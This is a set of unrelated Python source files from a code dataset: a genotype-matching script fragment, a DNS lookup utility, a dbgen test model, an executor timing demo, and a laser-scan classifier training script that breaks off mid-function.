    # Debug logging goes to stderr only with --verbose; stdout carries the
    # final tab-separated result.
    if args.verbose:
        ch.setLevel(logging.DEBUG)
    else:
        ch.setLevel(logging.WARN)
    # add ch to logger
    logger.addHandler(ch)

    matched_recipe_pango_alias = "none"
    matched_recipe_phe_label = "none"
    matched_confidence = "NA"

    logger.debug("Processing " + args.fasta_filename)
    # NOTE(review): assumes a single-record fasta with the whole sequence on
    # one line — a wrapped (multi-line) fasta would fail the length check.
    with open(args.fasta_filename) as fasta_file:
        header = fasta_file.readline()
        if header[0] != ">":
            logger.error("Error with fasta header line. "+header[0])
            exit(-1)
        sequence = fasta_file.readline().rstrip()
        if len(sequence) != WUHAN_REFERENCE_LENGTH:
            logger.error("Error, sequence doesn't match Wuhan reference length.")
            exit(-1)

    # `recipes` is also read as a module-level global inside
    # get_recipe_match_confidence when recipes depend on each other.
    with open(args.genotype_recipe_filename) as genotype_recipe_file:
        recipes = load_yaml(genotype_recipe_file)

    (matched_recipe_phe_label,
     matched_recipe_pango_alias,
     matched_confidence) = find_all_matching_recipes(recipes=recipes, sequence=sequence)

    print(matched_recipe_phe_label, matched_recipe_pango_alias, matched_confidence, datetime.now(), sep="\t")
    # print(matched_recipe_phe_label, matched_recipe_pango_alias, matched_confidence, datetime.now(), sep="\t")
| StarcoderdataPython |
154839 | <reponame>tomwisniewskiprv/Python_networking<gh_stars>0
# -*- coding: utf-8 -*-
# Python 3.6
# Python_networking | remote_machine_ip
# 12.07.2017 <NAME>
import socket
import argparse
import sys
def get_remote_machine_ip(remote_host):
    """Resolve *remote_host* via DNS and print its IPv4 address.

    On resolution failure, prints the error and a hint instead of raising.
    """
    try:
        print("IP address of {} : {}".format(remote_host, socket.gethostbyname(remote_host)))
    except socket.error as err:
        # BUG FIX: the original printed the exception *class* (socket.error)
        # rather than the actual error raised for this lookup.
        print("{}".format(err))
        print("Please check your host name.")
def main(remote_host):
    """Entry point: look up and report the IP address of *remote_host*."""
    return get_remote_machine_ip(remote_host)
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Check IP address for remote host.")
    parser.add_argument("host", help="Remote or local host name.")
    args = parser.parse_args()
    # Resolve and print the IP, then exit explicitly with status 0.
    main(args.host)
    sys.exit()
| StarcoderdataPython |
55988 | <filename>tests/example/map_model.py<gh_stars>1-10
# Copyright 2021 Modelyst LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dbgen import Entity, Extract, Generator, Model
class MapEntity(Entity, table=True):
    """dbgen entity (database table) with a single identifying string column."""

    # Rows are uniquely identified by their label value.
    __identifying__ = {
        'label',
    }
    label: str
class CustomExtractor(Extract):
    """Extractor that emits the integers 0..n-1, one row at a time.

    Each row is a dict keyed by 'out', the output name consumed downstream.
    """

    n: int = 1000

    def extract(self):
        yield from ({'out': value} for value in range(self.n))

    def length(self, **_):
        # Total number of rows this extractor will yield.
        return self.n
# Extractor producing 100 integer rows under the name 'out'.
extract = CustomExtractor(n=100)
# Map a python callable over the extractor's 'out' stream (int -> str).
map_pb = extract['out'].map(lambda x: str(x))
# Insert each mapped value as a new MapEntity row with strict validation.
map_load = MapEntity.load(insert=True, validation='strict', label=map_pb['out'])
gen = Generator(name='test_map', transforms=[], loads=[map_load])
model = Model(name='test_map')
model.add_gen(gen)
| StarcoderdataPython |
3305471 | #!/usr/bin/env python3
import concurrent.futures
import time
def func():
    """Unit of work for the executor demo: print a marker, then block for 1 s."""
    print('func')
    time.sleep(1)
def main():
    """Run 10 one-second tasks on a thread pool and a process pool, timing each.

    BUG FIX: the elapsed time is now read *after* leaving each ``with`` block.
    Exiting the block triggers an implicit ``executor.shutdown(wait=True)``,
    which blocks until all submitted tasks finish; the original printed the
    time inside the block, so it only measured the submission calls, not the
    actual work.
    """
    s_time = time.time()
    with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
        for _ in range(10):
            executor.submit(func)
    print('Took {} [sec]'.format(time.time() - s_time))

    s_time = time.time()
    with concurrent.futures.ProcessPoolExecutor(max_workers=2) as executor:
        for _ in range(10):
            executor.submit(func)
    print('Took {} [sec]'.format(time.time() - s_time))
if __name__ == '__main__':
    # Guard is required: ProcessPoolExecutor re-imports this module in workers.
    main()
| StarcoderdataPython |
1728960 | import os
import csv
import time
import yaml
import shutil
import pickle
import argparse
import numpy as np
import tensorflow as tf
# import tensorflow.compat.v1 as tf
# tf.disable_v2_behavior()
import matplotlib.pyplot as plt
from sklearn.utils import shuffle
# Laser scanner geometry: 270-degree (1.5*pi rad) field of view, 720 beams.
SCAN_RANGE = 1.5 * np.pi
SCAN_NUM = 720
def make_args():
    """Parse CLI args, merge in the YAML training config, and prepare rslts dir.

    Every key/value from the YAML file is copied onto the argparse namespace.
    Side effects: creates a timestamped results directory and copies the
    config file into it for reproducibility.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--training_params_filename',
                        type=str,
                        default='train_scan_classifier.yaml',
                        help='Name of filename defining the learning params')
    args = parser.parse_args()

    # BUG FIX: yaml.load() without an explicit Loader is unsafe and raises
    # TypeError on PyYAML >= 6; safe_load avoids executing arbitrary YAML
    # tags. The config file is now also closed deterministically.
    with open(args.training_params_filename) as config_file:
        config = yaml.safe_load(config_file)
    for k, v in config.items():
        args.__dict__[k] = v
    args.lr = float(args.lr)
    # centering_on_gp and cropping are mutually exclusive augmentations.
    if args.centering_on_gp:
        args.cropping = False

    args.rslts_dir = os.path.join("..", "rslts", "{}".format(time.strftime("%Y-%m-%d-%H-%M-%S")))
    os.makedirs(args.rslts_dir, exist_ok=True)
    shutil.copyfile(args.training_params_filename, os.path.join(args.rslts_dir, args.training_params_filename))

    # Number of output classes = number of contexts being classified.
    args.Dy = len(args.used_context)
    return args
def plot_scan(scan, gp, save_path, args):
    """Save a polar plot of one laser scan together with its global-plan points.

    scan: 1-D array of ranges spanning SCAN_RANGE; gp: (N, 2) xy waypoints.
    """
    plt.polar(np.linspace(-SCAN_RANGE / 2, SCAN_RANGE / 2, len(scan)), scan)
    # Prepend the origin so the plotted plan starts at the robot.
    gp = np.concatenate([np.zeros((1, 2)), gp], axis=0)
    plt.polar(np.arctan2(gp[:, 1], gp[:, 0]), np.linalg.norm(gp, axis=-1))
    # Zero angle points "up" (robot heading); radial axis capped at clipping.
    plt.gca().set_theta_zero_location("N")
    plt.gca().set_ylim([0, args.clipping])
    plt.savefig(save_path)
    plt.close("all")
def preprocess_scan(scan, args):
    """Replace inf readings in a laser scan and clip ranges to args.clipping.

    Runs of np.inf are treated as dropouts:
    - a run touching either end of the scan is filled with 0.05 m,
    - an interior run is linearly interpolated between its finite neighbours.
    The fill step mutates *scan* in place; a clipped copy is returned.
    """
    i = 0
    while i < len(scan):
        if scan[i] != np.inf:
            i += 1
            continue
        # [i, j) is a maximal run of inf values.
        j = i + 1
        while j < len(scan) and scan[j] == np.inf:
            j += 1
        if i == 0 or j == len(scan):
            # Run touches the boundary: no second neighbour to interpolate to.
            scan[i:j] = 0.05 * np.ones(j - i)
        else:
            # BUG FIX: interpolate strictly between the two finite neighbours.
            # The original used linspace(scan[i-1], scan[j], j-i+1)[1:], whose
            # last fill value duplicated scan[j] instead of lying between
            # scan[i-1] and scan[j].
            scan[i:j] = np.linspace(scan[i - 1], scan[j], j - i + 2)[1:-1]
        i = j
    return scan.clip(0, args.clipping)
def preprocess_gp(gp):
    """Resample a global plan into 10 waypoints spaced roughly 0.2 m apart.

    gp: array of shape (2, N) whose columns are consecutive (x, y) points.
    Returns an array of shape (10, 2); when the plan is shorter than ~2 m,
    the final plan point is repeated to pad the output.
    """
    waypoints = []
    next_node = 1
    travelled = 0.0
    points = gp.T
    for start, end in zip(points[:-1], points[1:]):
        travelled += np.linalg.norm(end - start)
        # Emit a waypoint each time cumulative distance passes a 0.2 m mark.
        if travelled > next_node * 0.2:
            waypoints.append(end)
            next_node += 1
            if next_node == 11:
                break
    # Pad with the last plan point until exactly 10 waypoints exist.
    while next_node < 11:
        waypoints.append(points[-1])
        next_node += 1
    return np.array(waypoints)
def get_dataset(args, draw_data=False):
    """Load pickled (scan, global-plan) pairs per context and split train/test.

    Each entry of args.used_context names a pickle in ../bag_files; the list
    index of the context is the integer class label. Returns
    ([scan_train, gp_train], y_train, [scan_test, gp_test], y_test) as numpy
    arrays; test arrays are empty when args.full_train is set. With
    draw_data=True, per-sample polar plots and dataset histograms are written
    under ../data_plots.
    """
    scan_train, gp_train, y_train = [], [], []
    scan_test, gp_test, y_test = [], [], []
    for y, fname in enumerate(args.used_context):
        fname_ = os.path.join("../bag_files", fname + ".pkl")
        # Missing recordings for a context are silently skipped.
        if not os.path.exists(fname_):
            continue

        scans = []
        gps = []
        ys = []
        with open(fname_, "rb") as f:
            # latin1 is needed to unpickle files written by Python 2.
            data = pickle.load(f, encoding='latin1')
            for scan, gp in data:
                scan = preprocess_scan(scan, args)
                gp = preprocess_gp(gp)
                scans.append(scan)
                gps.append(gp)
                ys.append(y)

        if draw_data:
            fig_dir = os.path.join("..", "data_plots", fname)
            os.makedirs(fig_dir, exist_ok=True)
            for i, (scan, gp) in enumerate(zip(scans, gps)):
                plot_scan(scan, gp, os.path.join(fig_dir, str(i)), args)

        # # use first and last 10 % as testing data
        num_X = len(scans)
        if not args.full_train:
            # scan_test.extend(np.concatenate([scans[:num_X // 10], scans[-num_X // 10:]]))
            # gp_test.extend(np.concatenate([gps[:num_X // 10], gps[-num_X // 10:]]))
            # y_test.extend(ys[:num_X // 10] + ys[-num_X // 10:])
            # scan_train.extend(scans[num_X // 10:-num_X // 10])
            # gp_train.extend(gps[num_X // 10:-num_X // 10])
            # y_train.extend(ys[num_X // 10:-num_X // 10])

            # Random 20 % test split. ys is not shuffled together with
            # scans/gps, but every label in this loop iteration equals y,
            # so the pairing stays correct.
            scans, gps = shuffle(scans, gps)
            scan_test.extend(scans[:num_X // 5])
            gp_test.extend(gps[:num_X // 5])
            y_test.extend(ys[:num_X // 5])
            scan_train.extend(scans[num_X // 5:])
            gp_train.extend(gps[num_X // 5:])
            y_train.extend(ys[num_X // 5:])
        else:
            scan_train.extend(scans)
            gp_train.extend(gps)
            y_train.extend(ys)

    # print stats
    scans = np.array(scan_train + scan_test)
    y = np.array(y_train + y_test)
    scan_train = np.array(scan_train)
    gp_train = np.array(gp_train)
    y_train = np.array(y_train)
    scan_test = np.array(scan_test)
    gp_test = np.array(gp_test)
    y_test = np.array(y_test)
    print("Num of train", len(scan_train))
    print("Num of test", len(scan_test))

    if draw_data:
        # Histogram of all range readings across the dataset.
        plt.figure()
        plt.hist(scans.reshape((-1), 1), bins="auto")
        plt.title("Laser scan distribution")
        plt.ylim([0, 10000])
        plt.savefig("../data_plots/scan_distribution")

        # Per-class sample counts.
        plt.figure()
        (unique, counts) = np.unique(y, return_counts=True)
        plt.bar(unique, counts)
        plt.title("label_distribution")
        plt.savefig("../data_plots/label_distribution")

    return [scan_train, gp_train], y_train, [scan_test, gp_test], y_test
class ScanClassifier(object):
    def __init__(self, args):
        """Cache all hyperparameters from the parsed config namespace.

        Nothing TF-related happens here; the graph is built lazily by
        _init_model() (tracked by the mode_inited flag).
        """
        # Input width (number of beams fed to the net) and output class count.
        self.Dx = args.Dx
        self.Dy = args.Dy
        self.used_context = args.used_context

        # Architecture options: Evidential Deep Learning head, dropout,
        # dense layer sizes for the scan and global-plan branches.
        self.use_EDL = args.use_EDL
        self.dropout_rate = args.dropout_rate
        self.scan_Dhs = args.scan_Dhs
        self.gp_Dhs = args.gp_Dhs
        # Optional Conv1D front-end for the scan branch.
        self.use_conv1d = args.use_conv1d
        self.kernel_sizes = args.kernel_sizes
        self.filter_sizes = args.filter_sizes
        self.strides = args.strides

        # Training hyperparameters.
        self.lr = args.lr
        self.epochs = args.epochs
        self.batch_size = args.batch_size
        self.full_train = args.full_train
        self.rslts_dir = args.rslts_dir
        # "use_weigth" [sic] — spelling matches the YAML config key.
        self.use_weigth = args.use_weigth

        # Data preprocessing / augmentation options.
        self.clipping = args.clipping
        self.centering_on_gp = args.centering_on_gp
        self.cropping = args.cropping
        self.theta_noise_scale = args.theta_noise_scale
        self.noise = args.noise
        self.noise_scale = args.noise_scale
        self.flipping = args.flipping
        self.translation = args.translation
        self.translation_scale = args.translation_scale

        # Lazy-graph flag ("mode_inited" [sic], presumably "model_inited").
        self.mode_inited = False
    def _init_model(self):
        """Build the TF1 (graph-mode) classifier: placeholders, layers, loss, optimizer.

        Two encoder branches (laser scan, global plan) are concatenated and fed
        to a dropout + dense classification head. With use_EDL the head is
        trained with an evidential Dirichlet loss (softplus evidence,
        alpha = evidence + 1 — presumably following Sensoy et al. 2018, "Evidential
        Deep Learning"); otherwise a standard softmax cross-entropy is used.
        Creates self.sess and initializes all variables as a side effect.
        """
        tf.keras.backend.set_learning_phase(1)

        # Input placeholders: scans (batch, Dx), plans (batch, 10, 2),
        # integer labels, KL annealing step, dropout rate, per-sample weights.
        self.scan_ph = tf.placeholder(tf.float32, shape=(None, self.Dx))
        self.gp_ph = tf.placeholder(tf.float32, shape=(None, 10, 2))
        self.label_ph = tf.placeholder(tf.int32, shape=(None,))
        self.annealing_step_ph = tf.placeholder(dtype=tf.int32)
        self.dropout_rate_ph = tf.placeholder(dtype=tf.float32)
        self.weight_ph = tf.placeholder(tf.float32, shape=(None,))

        # Layer lists are kept so _save_model/_load_model can (de)serialize them.
        self.scan_encoder, self.gp_encoder, self.classify_layers = [], [], []
        if self.use_conv1d:
            for kernel_size, filter_size, stride in zip(self.kernel_sizes, self.filter_sizes, self.strides):
                self.scan_encoder.append(tf.keras.layers.Conv1D(filter_size, kernel_size, strides=stride,
                                                                activation="relu"))
            self.scan_encoder.append(tf.keras.layers.Flatten())
        else:
            for Dh in self.scan_Dhs:
                self.scan_encoder.append(tf.keras.layers.Dense(Dh, activation="relu"))
        self.gp_encoder.append(tf.keras.layers.Flatten())
        for Dh in self.gp_Dhs:
            self.gp_encoder.append(tf.keras.layers.Dense(Dh, activation="relu"))
        self.classify_layers.append(tf.keras.layers.Dropout(rate=self.dropout_rate_ph))
        self.classify_layers.append(tf.keras.layers.Dense(self.Dy))

        scan_h = self.scan_ph
        if self.use_conv1d:
            # Conv1D expects a channel dimension: (batch, Dx) -> (batch, Dx, 1).
            scan_h = scan_h[..., tf.newaxis]
        for layer in self.scan_encoder:
            scan_h = layer(scan_h)
        if self.gp_Dhs == [0]:
            # gp branch disabled: contribute a zero-width tensor to the concat.
            gp_h = tf.zeros_like(scan_h[:, :0])
        else:
            gp_h = self.gp_ph
            for layer in self.gp_encoder:
                gp_h = layer(gp_h)
        h = tf.concat([scan_h, gp_h], axis=-1)
        for layer in self.classify_layers:
            if isinstance(layer, tf.keras.layers.Dropout):
                # NOTE(review): training=False means dropout is never active
                # here, even during training — confirm this is intentional.
                h = layer(h, training=False)
            else:
                h = layer(h)

        global_step_ = tf.Variable(initial_value=0, name='global_step', trainable=False)
        if self.use_EDL:
            # Evidential head: non-negative evidence -> Dirichlet concentration
            # alpha; uncertainty = K / sum(alpha); prob = normalized alpha.
            self.evidence = tf.nn.softplus(h)
            self.alpha = self.evidence + 1
            self.uncertainty = self.Dy / tf.reduce_sum(self.alpha, axis=-1)
            self.confidence = 1 - self.uncertainty
            self.prob = self.alpha / tf.reduce_sum(self.alpha, axis=-1, keepdims=True)
            self.pred = tf.argmax(self.alpha, axis=-1, output_type=tf.int32)

            def KL(alpha, K):
                # KL divergence between Dirichlet(alpha) and the uniform
                # Dirichlet(1, ..., 1) — the EDL regularizer.
                beta = tf.constant(np.ones((1, K)), dtype=tf.float32)
                S_alpha = tf.reduce_sum(alpha, axis=1, keepdims=True)
                KL = tf.reduce_sum((alpha - beta) * (tf.digamma(alpha) - tf.digamma(S_alpha)), axis=1, keepdims=True) +\
                    tf.lgamma(S_alpha) - tf.reduce_sum(tf.lgamma(alpha), axis=1, keepdims=True) + \
                    tf.reduce_sum(tf.lgamma(beta), axis=1, keepdims=True) - \
                    tf.lgamma(tf.reduce_sum(beta, axis=1, keepdims=True))
                return KL

            def expected_cross_entropy(p, alpha, K, global_step, annealing_step):
                # Expected cross-entropy under Dirichlet(alpha), plus a KL term
                # annealed in over `annealing_step` steps.
                if self.use_weigth:
                    p = p * self.weight_ph[:, tf.newaxis]
                loglikelihood = tf.reduce_mean(
                    tf.reduce_sum(p * (tf.digamma(tf.reduce_sum(alpha, axis=1, keepdims=True)) - tf.digamma(alpha)), 1,
                                  keepdims=True))
                KL_reg = tf.minimum(1.0, tf.cast(global_step / annealing_step, tf.float32)) * KL(
                    (alpha - 1) * (1 - p) + 1, K)
                return loglikelihood + KL_reg

            label = tf.one_hot(self.label_ph, self.Dy)
            loss = expected_cross_entropy(label, self.alpha, self.Dy, global_step_, self.annealing_step_ph)
            self.loss = tf.reduce_mean(loss)
        else:
            # Standard softmax classifier with optional per-sample weighting.
            logits = h
            loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=self.label_ph, logits=logits)
            if self.use_weigth:
                loss = loss * self.weight_ph
            self.loss = tf.reduce_mean(loss)
            self.pred = tf.argmax(logits, axis=-1, output_type=tf.int32)
        pred_correctness = tf.equal(self.pred, self.label_ph)
        self.acc = tf.reduce_mean(tf.cast(pred_correctness, tf.float32))

        optimizer = tf.train.AdamOptimizer(learning_rate=self.lr)
        self.train_op = optimizer.minimize(self.loss, global_step=global_step_)

        # Session with on-demand GPU memory growth; variables initialized here.
        config = tf.ConfigProto()
        config.gpu_options.allow_growth = True
        self.sess = tf.Session(config=config)
        tf.keras.backend.set_session(self.sess)
        self.sess.run(tf.global_variables_initializer())
        # self.writer = tf.summary.FileWriter(self.rslts_dir)
    def _save_model(self, epoch_num):
        """Pickle all layer weights to <rslts_dir>/models/model_<epoch_num>.pickle.

        Weights are keyed "weights_<module>_<layer>" rather than stored as a TF
        checkpoint, so _load_model can restore them layer by layer. protocol=2
        keeps the file readable from Python 2 tooling.
        """
        model_dir = os.path.join(self.rslts_dir, "models")
        os.makedirs(model_dir, exist_ok=True)

        params = {}
        for i, module in enumerate([self.scan_encoder, self.gp_encoder, self.classify_layers]):
            for j, layer in enumerate(module):
                weights = layer.get_weights()
                params["weights_{}_{}".format(i, j)] = weights
        with open(os.path.join(model_dir, "model_{}.pickle".format(epoch_num)), "wb") as f:
            pickle.dump(params, f, protocol=2)
    def _load_model(self, fname):
        """Restore layer weights from a pickle produced by _save_model.

        Builds the TF graph first if necessary so the keras layers exist
        before their weights are assigned.
        """
        if not self.mode_inited:
            self._init_model()
            self.mode_inited = True
        with open(fname, "rb") as f:
            params = pickle.load(f)
        for i, module in enumerate([self.scan_encoder, self.gp_encoder, self.classify_layers]):
            # Skip the gp encoder when the gp branch was disabled (never built).
            if module == self.gp_encoder and self.gp_Dhs == [0]:
                continue
            for j, layer in enumerate(module):
                weights = params["weights_{}_{}".format(i, j)]
                layer.set_weights(weights)
    def _data_augment(self, scans, gps, training=False):
        """Normalize, crop/center, and (in training) randomly augment a batch.

        scans.shape = (batch_size, D_scan); gps.shape = (batch_size, 10, 2).
        Ranges are clipped to self.clipping and scaled to [0, 1]. Depending on
        config, scans are cropped to Dx beams either around the scan center
        (cropping) or around the mean direction of the first 5 plan points
        (centering_on_gp). Training mode additionally applies random flips,
        angular jitter, and uniform noise. gps may be mutated in place (e.g.
        by the flipping step). Returns (scans, gps, data_valid) where
        data_valid marks samples whose crop window fit inside the scan.
        """
        # scans.shape = (batch_size, D_scan)
        # gps.shape = (batch_size, 10, 2)
        # scan_ori/gp_ori are only used by the commented-out debug plots below.
        scan_ori, gp_ori = scans.copy(), gps.copy()
        scans = scans.copy()
        scans = np.clip(scans, 0, self.clipping)
        scans /= self.clipping
        data_valid = np.full(len(scans), True)
        if training:
            batch_size = scans.shape[0]
            if self.flipping:
                # Mirror scan (beam order) and plan (y sign) together.
                is_flipped = np.random.rand(batch_size) < 0.5
                scans[is_flipped] = np.flip(scans[is_flipped], axis=-1)
                gps[is_flipped, :, 1] = -gps[is_flipped, :, 1]
            if self.centering_on_gp:
                # Crop Dx beams centered on the mean heading of the first
                # 5 plan points; out-of-range windows are marked invalid.
                theta = np.arctan2(gps[:, :, 1], gps[:, :, 0])
                avg_theta = np.mean(theta[:, :5], axis=-1)
                start_idxes = (avg_theta / SCAN_RANGE * SCAN_NUM).astype(int) + SCAN_NUM // 2 - self.Dx // 2
                data_valid = np.logical_and(start_idxes >= 0, start_idxes + self.Dx < SCAN_NUM)
                start_idxes[np.logical_not(data_valid)] = 0
                scans = np.array([scans[i, idx:idx + self.Dx] for i, idx in enumerate(start_idxes)])
            if self.cropping:
                # Center crop with random angular jitter; the plan is rotated
                # by the same jitter to stay consistent with the crop.
                theta_noise = np.random.uniform(-self.theta_noise_scale, self.theta_noise_scale, size=batch_size)
                theta_noise = theta_noise / 180 * np.pi
                start_idxes = (theta_noise / SCAN_RANGE * SCAN_NUM).astype(int) + (SCAN_NUM - self.Dx) // 2
                theta = np.arctan2(gps[:, :, 1], gps[:, :, 0])
                r = np.linalg.norm(gps, axis=-1)
                theta = theta - theta_noise[:, np.newaxis]
                gps = np.stack([r * np.cos(theta), r * np.sin(theta)], axis=-1)
                scans = np.array([scans[i, idx:idx + self.Dx] for i, idx in enumerate(start_idxes)])
            if self.noise:
                # Uniform noise, scaled so it is expressed in normalized units.
                scale = self.noise_scale / self.clipping
                scan_noise = np.random.uniform(-scale, scale, size=scans.shape)
                gp_noise = np.random.uniform(-scale, scale, size=gps.shape)
                scans, gps = scans + scan_noise, gps + gp_noise
        else:
            if self.centering_on_gp:
                # Deterministic version of the gp-centered crop, with care for
                # plan headings that wrap around the +/- pi discontinuity.
                thetas = np.arctan2(gps[:, :, 1], gps[:, :, 0])[:, :5]
                avg_thetas = np.zeros(thetas.shape[0])
                for i, theta in enumerate(thetas):
                    if np.any(theta < -SCAN_RANGE / 2) and np.any(theta > SCAN_RANGE / 2):
                        theta[theta < 0] += 2 * np.pi
                        avg_theta = np.mean(theta)
                        if avg_theta > np.pi:
                            avg_theta -= 2 * np.pi
                    else:
                        avg_theta = np.mean(theta)
                    avg_thetas[i] = avg_theta
                start_idxes = (avg_thetas / SCAN_RANGE * SCAN_NUM).astype(int) + SCAN_NUM // 2 - self.Dx // 2
                new_scans = np.zeros((scans.shape[0], self.Dx))
                for i, (idx, scan) in enumerate(zip(start_idxes, scans)):
                    if idx < 0 or idx + self.Dx >= len(scan):
                        data_valid[i] = False
                        new_scans[i] = np.zeros(self.Dx)
                    else:
                        new_scans[i] = scan[idx:idx + self.Dx]
                scans = new_scans
            if self.cropping:
                # Plain center crop; samples whose plan heading exceeds 60 deg
                # from straight ahead are marked invalid.
                i = (SCAN_NUM - self.Dx) // 2
                scans = scans[:, i:i + self.Dx]
                if not self.centering_on_gp:
                    thetas = np.arctan2(gps[:, :, 1], gps[:, :, 0])[:, :5]
                    avg_thetas = np.zeros(thetas.shape[0])
                    for i, theta in enumerate(thetas):
                        if np.any(theta < -SCAN_RANGE / 2) and np.any(theta > SCAN_RANGE / 2):
                            theta[theta < 0] += 2 * np.pi
                            avg_theta = np.mean(theta)
                            if avg_theta > np.pi:
                                avg_theta -= 2 * np.pi
                        else:
                            avg_theta = np.mean(theta)
                        avg_thetas[i] = avg_theta
                    data_valid = np.abs(avg_thetas) < np.pi / 3

        # for x1, x2, x3, x4 in zip(scans, gps, scan_ori, gp_ori):
        #     plt.polar(np.linspace(-SCAN_RANGE / 2, SCAN_RANGE / 2, len(x3)), x3)
        #     x4 = np.concatenate([np.zeros((1, 2)), x4], axis=0)
        #     plt.polar(np.arctan2(x4[:, 1], x4[:, 0]), np.linalg.norm(x4, axis=-1))
        #
        #     x1 *= self.clipping
        #     plt.polar(np.linspace(-SCAN_RANGE / 2, SCAN_RANGE / 2, len(x1)) * self.Dx / SCAN_NUM, x1)
        #     x2 = np.concatenate([np.zeros((1, 2)), x2], axis=0)
        #     plt.polar(np.arctan2(x2[:, 1], x2[:, 0]), np.linalg.norm(x2, axis=-1))
        #
        #     plt.gca().set_theta_zero_location("N")
        #     plt.gca().set_ylim([0, self.clipping])
        #     plt.show()

        return scans, gps, data_valid
    def _translation(self, scans, gps):
        """Augment each (scan, global-plan) pair with a random 2-D translation.

        For every sample a translation (trans_x, trans_y) is drawn uniformly
        from [-translation_scale, translation_scale]^2, the scan endpoints are
        shifted accordingly, and a new range scan is re-rendered by casting a
        ray at each original scan angle and intersecting it with the shifted
        point set.  The global plan is shifted by the same translation.
        """
        def find_intersect(x1, y1, x2, y2, angle):
            # Intersection of the line through (x1,y1)-(x2,y2) with the line
            # through the origin at the given angle, both in implicit form
            # A*x + B*y = C; solved by Cramer's rule.
            A1, B1, C1 = y1 - y2, x2 - x1, x2 * y1 - x1 * y2
            A2, B2, C2 = np.tan(angle), -1, 0
            x = (B2 * C1 - B1 * C2) / (A1 * B2 - A2 * B1)
            y = (A1 * C2 - A2 * C1) / (A1 * B2 - A2 * B1)
            return x, y
        new_scans, new_gps = [], []
        for scan, gp in zip(scans, gps):
            trans_x, trans_y = np.random.uniform(low=-self.translation_scale, high=self.translation_scale, size=2)
            # new scan: convert ranges to Cartesian points, shift them, then
            # re-render ranges from the new (translated) sensor origin.
            angles = np.linspace(-SCAN_RANGE / 2, SCAN_RANGE / 2, len(scan))
            x = np.cos(angles) * scan
            y = np.sin(angles) * scan
            x -= trans_x
            y -= trans_y
            new_angles = np.arctan2(y, x)
            new_scan = []
            for angle_i in angles:
                scan_len = []
                for j in range(len(new_angles) - 1):
                    new_angle_j = new_angles[j]
                    new_angle_jp1 = new_angles[j + 1]
                    # The ray at angle_i crosses this segment only if the two
                    # endpoint angles straddle angle_i (product <= 0).
                    if (new_angle_j - angle_i) * (new_angle_jp1 - angle_i) > 0:
                        # no intersection
                        continue
                    x_j, y_j = x[j], y[j]
                    x_jp1, y_jp1 = x[j + 1], y[j + 1]
                    if (new_angle_j - angle_i) * (new_angle_jp1 - angle_i) < 0:
                        # exists intersection, find out where it is
                        if np.sqrt((x_j - x_jp1) ** 2 + (y_j - y_jp1) ** 2) < 0.5:
                            # two points are close, they are on the same object
                            inter_x, inter_y = find_intersect(x_j, y_j, x_jp1, y_jp1, angle_i)
                        else:
                            # two are far away from each other, on the different object
                            # -> extrapolate along the nearer object's own edge
                            # instead of bridging the gap between objects.
                            if (x_j ** 2 + y_j ** 2) > (x_jp1 ** 2 + y_jp1 ** 2):
                                if j > 0:
                                    inter_x, inter_y = find_intersect(x_j, y_j, x[j - 1], y[j - 1], angle_i)
                                else:
                                    inter_x, inter_y = x_j, y_j
                            else:
                                if j < len(new_angles) - 2:
                                    inter_x, inter_y = find_intersect(x_jp1, y_jp1, x[j + 2], y[j + 2], angle_i)
                                else:
                                    inter_x, inter_y = x_jp1, y_jp1
                        scan_len.append(np.sqrt(inter_x ** 2 + inter_y ** 2))
                    else:
                        # Ray passes exactly through an endpoint.
                        # NOTE(review): both branches below are identical; the
                        # new_angle_jp1 == angle_i case presumably should use
                        # (x_jp1, y_jp1) -- confirm intent.
                        if new_angle_j == angle_i:
                            scan_len.append(np.sqrt(x_j ** 2 + y_j ** 2))
                        else:
                            scan_len.append(np.sqrt(x_j ** 2 + y_j ** 2))
                # Keep the closest intersection (a range scan reports the
                # nearest obstacle along each ray).
                if len(scan_len):
                    new_scan.append(np.min(scan_len))
                else:
                    # no intersection found: fall back to the segment between
                    # the two points whose angles are closest to the ray.
                    angle_diff = np.abs(new_angles - angle_i)
                    idx1, idx2 = np.argsort(angle_diff)[:2]
                    inter_x, inter_y = find_intersect(x[idx1], y[idx1], x[idx2], y[idx2], angle_i)
                    new_scan.append(np.sqrt(inter_x ** 2 + inter_y ** 2))
            new_scans.append(new_scan)
            # new gp: shift the plan by the same translation; the first four
            # points then get a linearly decaying fraction of the translation
            # added back ([0.8, 0.6, 0.4, 0.2]), presumably to blend the plan
            # start toward the untranslated origin -- TODO confirm.
            new_gp = gp - np.array([trans_x, trans_y])
            new_gp[:4] += np.linspace(1, 0, 5, endpoint=False)[1:, np.newaxis] * np.array([trans_x, trans_y])
            new_gps.append(new_gp)
        return np.array(new_scans), np.array(new_gps)
def train(self, X_train, y_train, X_test, y_test):
if not self.mode_inited:
self._init_model()
self.mode_inited = True
scan_train, gp_train = X_train
scan_test, gp_test = X_test
if self.translation:
with open("translation_aug.pkl", "rb") as f:
d = pickle.load(f)
(scan_aug_train_full, gp_aug_train_full), y_aug_train_full = d['X_train'], d['y_train']
(scan_aug_test_full, gp_aug_test_full), y_aug_test_full = d['X_test'], d['y_test']
full_contexts = ["curve", "open_space", "U_turn", "narrow_entrance", "narrow_corridor",
"normal_1", "normal_2"]
scan_aug_train, gp_aug_train, y_aug_train = [], [], []
scan_aug_test, gp_aug_test, y_aug_test = [], [], []
for y, ctx in enumerate(self.used_context):
y_label = full_contexts.index(ctx)
scan_aug_train.extend(scan_aug_train_full[y_aug_train_full == y_label])
gp_aug_train.extend(gp_aug_train_full[y_aug_train_full == y_label])
y_aug_train.extend([y] * np.sum(y_aug_train_full == y_label))
scan_aug_test.extend(scan_aug_test_full[y_aug_test_full == y_label])
gp_aug_test.extend(gp_aug_test_full[y_aug_test_full == y_label])
y_aug_test.extend([y] * np.sum(y_aug_test_full == y_label))
scans, gps, ys = shuffle(np.concatenate([scan_aug_train, scan_aug_test]),
np.concatenate([gp_aug_train, gp_aug_test]),
np.concatenate([y_aug_train, y_aug_test]))
